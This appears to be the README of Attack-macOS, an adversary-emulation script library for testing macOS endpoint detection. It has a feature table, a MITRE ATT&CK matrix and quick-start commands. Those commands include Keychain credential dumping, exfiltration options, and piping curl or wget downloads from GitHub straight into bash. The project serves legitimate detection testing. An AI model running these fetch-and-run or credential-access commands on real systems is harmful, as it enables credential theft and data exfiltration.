-grey?style=for-the-badge){kind=icon}
-grey?style=for-the-badge){kind=icon}
ATT&CK Matrix •
Key Features •
Quick Start •
Research Library
Attack-macOS is a library of scripts that security teams can use to evaluate macOS endpoint detection and response capabilities. This project aims to simplify the execution of Living Off The Orchard (LOObins) techniques via standalone scripts with built-in encoding, encryption, formatting, logging, and exfiltration over DNS and HTTPS/S.
flowchart TD
A1("🚫 Limited OSS testing tools")
A2("⚡ Existing tools are tier II/III (advanced C2s)")
A3("🛡️ Commercial tools focus on hardening and MDM")
style A1 stroke:#ff6b35,stroke-width:2px,fill:transparent
style A2 stroke:#ff6b35,stroke-width:2px,fill:transparent
style A3 stroke:#ff6b35,stroke-width:2px,fill:transparent
flowchart TD
A4("📊 Limited technique and procedure coverage")
A5("❓ Known risks are not common knowledge")
A6("🔧 Hard to operationalize test pipelines")
style A4 stroke:#ff6b35,stroke-width:2px,fill:transparent
style A5 stroke:#ff6b35,stroke-width:2px,fill:transparent
style A6 stroke:#ff6b35,stroke-width:2px,fill:transparent
flowchart TD
A1("✓ Build a library of attack scripts that help security teams evaluate and improve macOS endpoint detection and response capabilities.
")
style A1 stroke:#90EE90,stroke-width:2px,fill:transparent
| Feature | Description | Benefit |
|---|---|---|
| Builder Tool | Includes a YAML template, schema, and builder tool for creating new scripts with built-in argument parsing and validation. Parse Args | Eliminates script development time and reduces errors through automated validation |
| Modular Design | Self-contained scripts that can be used independently or combined, easily integrating with existing security test frameworks. | Enables quick deployment without complex tool chains or infrastructure changes |
| Standardized Help | All scripts include --help menus for standalone execution via custom deployment frameworks or attackmacos.sh handler. |
Accelerates execution by eliminating documentation lookup and deployment confusion |
| macOS Native | Uses native tools and interpreters without external dependencies. See LOOBins. | Produces macOS telemetry often attrivbuted to threat actors. |
| MITRE ATT&CK Mapped | All scripts and arguments directly mapped to the MITRE ATT&CK framework. | Streamlines compliance reporting and threat model alignment |
| Logging | Built-in syslog logging capability with output formatting in JSON or CSV for analysis. Log Output | Automates evidence collection and accelerates post-test analysis |
| Encoding and Encryption | Multiple data encoding options and integrated encryption functions including AES-256-CBC, GPG, and XOR. Encode Output • Encrypt Output | Improves test realism by simulating actual evasion techniques |
| Exfiltration | Simulates data exfiltration via HTTP/S or DNS protocols. Exfiltrate Data | Tests complete attack chains to identify detection gaps in data loss prevention |
| CI/CD Pipeline Ready | Integrates with existing security tools, automation pipelines, and CI/CD workflows. | Enables continuous security testing without manual intervention |
| Caldera Integration | Native Caldera plugin for seamless integration with red team operations. Caldera Plugin | Streamlines deployment and execution in enterprise red team frameworks |
flowchart TD
A( 1: Choose your procedure script) --> A1("🐚 Shell Scripts")
A --> A2("🟡 JXA Scripts")
A --> A3("🐍 Python Scripts")
A --> A4("🦉 Swift Scripts")
A1 --> B( 2: Choose Delivery Method)
A2 --> B
A3 --> B
A4 --> B
B --> B1("🏠 Local ")
B --> B2("☁️ Remote from GGH</br>curl</br>wget</>osascript ")
B1 --> C(3: Execute</br>T1634: Dump Keys)
B2 --> C
C --> C1("📋 Format")
C --> C2("🔧 Encode")
C --> C3("🔐 Encrypt")
C --> C4("📡 Exfiltrate")
C1 --> D("📋 Log and<br>🔍Analyze Events")
C2 --> D
C3 --> D
C4 --> D
D --> D1("🎯 Identify Endpoint</br>Detection Gaps")
style A1 fill:transparent,stroke:#6140E0,stroke-width:2px
style A2 fill:transparent,stroke:#C7B300,stroke-width:2px
style A3 fill:transparent,stroke:#3BC05A, stroke-width:2px
style A4 fill:transparent,stroke:#47B7F8, stroke-width:2px
style A fill:#0D0D0D,stroke:#7A6AB7,stroke-width:2px,color:#fff
style B fill:#0D0D0D,stroke:#7A6AB7,stroke-width:2px,color:#fff
style C fill:#0D0D0D,stroke:#EB5454,stroke-width:2px,color:#fff
style D fill:#0D0D0D,stroke:#7A6AB7,stroke-width:2px,color:#fff
style D1 fill:#1a237e,stroke:#47B7F8,stroke-width:2px,color:#fff
| Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command And Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|
 External Remote Services |
 Shared Modules |
 Socket Filters |
 Boot or Logon Initialization Scripts |
Socket Filters |
 Adversary-in-the-Middle |
 System Owner/User Discovery |
 VNC |
 Archive via Utility |
Socket Filters |
 Exfiltration Over Web Service |
 Disk Structure Wipe |
 Compromise Software Dependencies and Development Tools |
 JavaScript |
Boot or Logon Initialization Scripts |
 Path Interception by PATH Environment Variable |
 Embedded Payloads |
 Pluggable Authentication Modules |
 Internet Connection Discovery |
 Taint Shared Content |
 Screen Capture |
 Standard Encoding |
 Exfiltration Over Webhook |
 Direct Network Flood |
 Spearphishing Link |
 Malicious File |
Pluggable Authentication Modules |
 Create or Modify System Process |
Pluggable Authentication Modules |
 Keylogging |
 Permission Groups Discovery |
 SSH |
Adversary-in-the-Middle |
 Domain Generation Algorithms |
 Scheduled Transfer |
 External Defacement |
 Spearphishing Attachment |
 Cron |
Path Interception by PATH Environment Variable |
 LC_LOAD_DYLIB Addition |
 File/Path Exclusions |
 Password Guessing |
 Device Driver Discovery |
 SSH Hijacking |
Keylogging |
 DNS |
 Exfiltration Over Other Network Medium |
 OS Exhaustion Flood |
 Compromise Hardware Supply Chain |
 Scheduled Task/Job |
Create or Modify System Process |
 Sudo and Sudo Caching |
 Linux and Mac File and Directory Permissions Modification |
 OS Credential Dumping |
 Domain Account |
 Remote Services |
 Audio Capture |
 Symmetric Cryptography |
 Exfiltration Over Bluetooth |
 Application Exhaustion Flood |
 Supply Chain Compromise |
 AppleScript |
External Remote Services |
 Boot or Logon Autostart Execution |
Path Interception by PATH Environment Variable |
 Steal Web Session Cookie |
 Local Account |
 Remote Service Session Hijacking |
 Archive via Custom Method |
 Fast Flux DNS |
 Automated Exfiltration |
 Disk Wipe |
 Exploit Public-Facing Application |
 Native API |
LC_LOAD_DYLIB Addition |
Cron |
 Email Hiding Rules |
 Securityd Memory |
 System Checks |
 Software Deployment Tools |
 Email Collection |
 Application Layer Protocol |
 Exfiltration Over Symmetric Encrypted Non-C2 Protocol |
 Stored Data Manipulation |
 Content Injection |
 Command and Scripting Interpreter |
Boot or Logon Autostart Execution |
Scheduled Task/Job |
 Encrypted/Encoded File |
 Password Cracking |
 Domain Groups |
 Exploitation of Remote Services |
 Data from Removable Media |
 Remote Access Software |
 Exfiltration to Code Repository |
 Service Stop |
 Default Accounts |
 Launchctl |
Cron |
 Login Hook |
 Rootkit |
 Keychain |
 System Service Discovery |
 Internal Spearphishing |
 Local Data Staging |
Content Injection |
 Exfiltration Over Asymmetric Encrypted Non-C2 Protocol |
 Application or System Exploitation |
 Trusted Relationship |
 XPC Services |
Scheduled Task/Job |
 Process Injection |
Sudo and Sudo Caching |
 Password Managers |
 Network Sniffing |
 Lateral Tool Transfer |
 Automated Collection |
 Traffic Signaling |
 Exfiltration Over C2 Channel |
 Runtime Data Manipulation |
 Phishing |
 User Execution |
 Browser Extensions |
 Launch Daemon |
 Match Legitimate Name or Location |
Network Sniffing |
 Network Share Discovery |
 Clipboard Data |
 Protocol Tunneling |
 Exfiltration Over Alternative Protocol |
 Reflection Amplification |
|
 Valid Accounts |
Software Deployment Tools |
Login Hook |
Default Accounts |
 Masquerade File Type |
 Steal or Forge Kerberos Tickets |
 Peripheral Device Discovery |
 Remote Data Staging |
 Mail Protocols |
 Exfiltration over USB |
 Service Exhaustion Flood |
|
 Spearphishing Voice |
 Unix Shell |
Traffic Signaling |
 Trap |
 Hide Artifacts |
 Credentials from Password Stores |
 System Information Discovery |
 Data from Local System |
 Communication Through Removable Media |
 Exfiltration to Text Storage Sites |
 Defacement |
|
 Compromise Software Supply Chain |
 Inter-Process Communication |
Launch Daemon |
 Dynamic Linker Hijacking |
System Checks |
 Unsecured Credentials |
 Wi-Fi Discovery |
 Archive via Library |
 External Proxy |
 Exfiltration to Cloud Storage |
 Financial Theft |
|
 Domain Accounts |
 Exploitation for Client Execution |
 Web Shell |
 Abuse Elevation Control Mechanism |
 Clear Linux or Mac System Logs |
 Credentials from Web Browsers |
 Application Window Discovery |
 Archive Collected Data |
 Proxy |
 Data Transfer Size Limits |
 Internal Defacement |
|
 Hardware Additions |
 Python |
Default Accounts |
 Setuid and Setgid |
 Stripped Payloads |
 DHCP Spoofing |
 Time Based Evasion |
DHCP Spoofing |
 Dynamic Resolution |
 Exfiltration Over Physical Medium |
 Data Manipulation |
|
 Drive-by Compromise |
 System Services |
Trap |
 SSH Authorized Keys |
 Gatekeeper Bypass |
 Private Keys |
 Browser Information Discovery |
 Web Portal Capture |
 Web Service |
 Exfiltration Over Unencrypted Non-C2 Protocol |
 Account Access Removal |
|
 Spearphishing via Service |
 Visual Basic |
Dynamic Linker Hijacking |
 Login Items |
 Code Signing |
 Password Spraying |
 System Network Configuration Discovery |
 Video Capture |
 DNS Calculation |
 Data Encrypted for Impact |
||
 Local Accounts |
 Malicious Link |
 Local Account |
 Emond |
 Break Process Trees |
Web Portal Capture |
 Account Discovery |
 Email Forwarding Rule |
 Multi-Stage Channels |
 Endpoint Denial of Service |
||
 At |
SSH Authorized Keys |
 Account Manipulation |
 Clear Network Connection History and Configurations |
 Steal or Forge Authentication Certificates |
 File and Directory Discovery |
 Data Staged |
 Port Knocking |
 Resource Hijacking |
|||
 Domain Account |
 Kernel Modules and Extensions |
 Clear Command History |
 Bash History |
 System Network Connections Discovery |
 GUI Input Capture |
 File Transfer Protocols |
 Transmitted Data Manipulation |
||||
 Component Firmware |
 Hijack Execution Flow |
 Deobfuscate/Decode Files or Information |
 Credentials In Files |
 Virtualization/Sandbox Evasion |
 Data from Network Shared Drive |
 One-Way Communication |
 Data Destruction |
||||
 Pre-OS Boot |
Valid Accounts |
 Impair Defenses |
 Web Cookies |
 Log Enumeration |
 Input Capture |
 Multi-hop Proxy |
 Network Denial of Service |
||||
Login Items |
 Exploitation for Privilege Escalation |
 Masquerading |
 Forge Web Credentials |
 Process Discovery |
 ARP Cache Poisoning |
 Data Obfuscation |
 Firmware Corruption |
||||
Port Knocking |
 Event Triggered Execution |
 Clear Mailbox Data |
 Multi-Factor Authentication Request Generation |
 User Activity Based Checks |
 Data from Information Repositories |
 Non-Standard Port |
 Inhibit System Recovery |
||||
 Compromise Host Software Binary |
 Unix Shell Configuration Modification |
Process Injection |
 Exploitation for Credential Access |
 Local Groups |
 Encrypted Channel |
 Disk Content Wipe |
|||||
Emond |
 Elevated Execution with Prompt |
Traffic Signaling |
GUI Input Capture |
 Password Policy Discovery |
 Bidirectional Communication |
 System Shutdown/Reboot |
|||||
Account Manipulation |
 Startup Items |
 System Binary Proxy Execution |
 Brute Force |
 System Language Discovery |
 Asymmetric Cryptography |
||||||
Kernel Modules and Extensions |
Domain Accounts |
 Timestomp |
 Credential Stuffing |
 System Location Discovery |
 Non-Application Layer Protocol |
||||||
Hijack Execution Flow |
 Launch Agent |
 Reflective Code Loading |
 Multi-Factor Authentication |
 Security Software Discovery |
 Protocol Impersonation |
||||||
Valid Accounts |
 Installer Packages |
 Ignore Process Interrupts |
Input Capture |
 Remote System Discovery |
 Domain Fronting |
||||||
Multi-Factor Authentication |
 RC Scripts |
Time Based Evasion |
ARP Cache Poisoning |
 Network Service Discovery |
 Data Encoding |
||||||
Event Triggered Execution |
 Re-opened Applications |
 Disable or Modify System Firewall |
 Multi-Factor Authentication Interception |
 Software Discovery |
 Non-Standard Encoding |
||||||
Unix Shell Configuration Modification |
 TCC Manipulation |
 Electron Applications |
 Modify Authentication Process |
 Debugger Evasion |
 Web Protocols |
||||||
Startup Items |
At |
 Code Signing Policy Modification |
 System Time Discovery |
 Ingress Tool Transfer |
|||||||
Domain Accounts |
 Dylib Hijacking |
 Binary Padding |
 Hide Infrastructure |
||||||||
Launch Agent |
Local Accounts |
Default Accounts |
 Steganography |
||||||||
 Server Software Component |
Dynamic Linker Hijacking |
 Fallback Channels |
|||||||||
Installer Packages |
 File and Directory Permissions Modification |
 Internal Proxy |
|||||||||
RC Scripts |
Abuse Elevation Control Mechanism |
 Dead Drop Resolver |
|||||||||
 Create Account |
Setuid and Setgid |
 Junk Data |
|||||||||
Re-opened Applications |
 Indicator Blocking |
||||||||||
 Power Settings |
 Right-to-Left Override |
||||||||||
At |
Component Firmware |
||||||||||
Modify Authentication Process |
 Indicator Removal |
||||||||||
Dylib Hijacking |
 Masquerade Task or Service |
||||||||||
Local Accounts |
 Plist File Modification |
||||||||||
Pre-OS Boot |
|||||||||||
 Downgrade Attack |
|||||||||||
Virtualization/Sandbox Evasion |
|||||||||||
 Execution Guardrails |
|||||||||||
Port Knocking |
|||||||||||
 Hidden Users |
|||||||||||
 Impair Command History Logging |
|||||||||||
User Activity Based Checks |
|||||||||||
 Disable or Modify Tools |
|||||||||||
Hijack Execution Flow |
|||||||||||
 Indicator Removal from Tools |
|||||||||||
Valid Accounts |
|||||||||||
 Resource Forking |
|||||||||||
 Obfuscated Files or Information |
|||||||||||
Multi-Factor Authentication |
|||||||||||
 Invalid Code Signature |
|||||||||||
 Run Virtual Instance |
|||||||||||
 Subvert Trust Controls |
|||||||||||
Elevated Execution with Prompt |
|||||||||||
 Rename System Utilities |
|||||||||||
 Spoof Security Alerting |
|||||||||||
 Steganography |
|||||||||||
Domain Accounts |
|||||||||||
 Install Root Certificate |
|||||||||||
 Compile After Delivery |
|||||||||||
 VBA Stomping |
|||||||||||
 Impersonation |
|||||||||||
 Hidden Window |
|||||||||||
 Clear Persistence |
|||||||||||
 HTML Smuggling |
|||||||||||
 Command Obfuscation |
|||||||||||
 File Deletion |
|||||||||||
 Software Packing |
|||||||||||
 Hidden File System |
|||||||||||
Debugger Evasion |
|||||||||||
 Space after Filename |
|||||||||||
TCC Manipulation |
|||||||||||
 Hidden Files and Directories |
|||||||||||
 Environmental Keying |
|||||||||||
Modify Authentication Process |
|||||||||||
Dylib Hijacking |
|||||||||||
Local Accounts |
|||||||||||
 Exploitation for Defense Evasion |
# 1. Clone the repository
git clone https://github.com/yourusername/attack-macOS.git
cd attack-macOS
# 2. Local execution using the handler
./attackmacos/attackmacos.sh --method local --tactic discovery --ttp browser_history --args='-s'
# 3. Remote execution using the handler
./attackmacos/attackmacos.sh --method curl --tactic credential_access --ttp keychain --args='--verbose --encode base64'
# 4. List available TTPs for a tactic
./attackmacos/attackmacos.sh --list-local --tactic discovery
./attackmacos/attackmacos.sh --list-remote --tactic credential_access
# 5. Show banner and help
./attackmacos/attackmacos.sh --banner --help# 1. Build and sync Caldera plugin
python cicd/build_shell_procedure.py --sync-caldera
# 2. Copy plugin to Caldera
cp -r integrations/caldera/plugins/attackmacos /path/to/caldera/plugins/
# 3. Restart Caldera server
# Plugin abilities will be available in operations
# 4. Use with facts in Caldera
# Set fact: user.arg = "--safari --chrome --search malware"
# Execute ability: browser_historyCaldera Documentation: Caldera Plugin Guide
# 1. Clone the repository
git clone https://github.com/yourusername/attack-macOS.git
cd attack-macOS
# 2. Run a technique directly
./ttp/discovery/shell/system_info.sh
# 3. Run with custom parameters
./ttp/credential_access/shell/keychain.sh --verbose --log-output --encode base64
# 4. Use the builder to create custom scripts
cd tools
python3 build_shell_procedure.py --input ../attackmacos/ttp/discovery/shell/system_info.yml --output ../custom_scripts/# 1. Execute directly from GitHub without cloning
curl -s https://raw.githubusercontent.com/yourusername/attack-macOS/main/ttp/discovery/shell/system_info.sh | bash
# 2. Download and execute with parameters
curl -s https://raw.githubusercontent.com/yourusername/attack-macOS/main/ttp/credential_access/shell/keychain.sh | bash -s -- --verbose --log-output --encode base64
# 3. Execute specific technique with wget
wget -qO- https://raw.githubusercontent.com/yourusername/attack-macOS/main/ttp/discovery/shell/browser_history.sh | bashApache License 2.0. LICENSE
Contributor acknowledgements and project credits Acknowledgements.md.
Research references see References.md.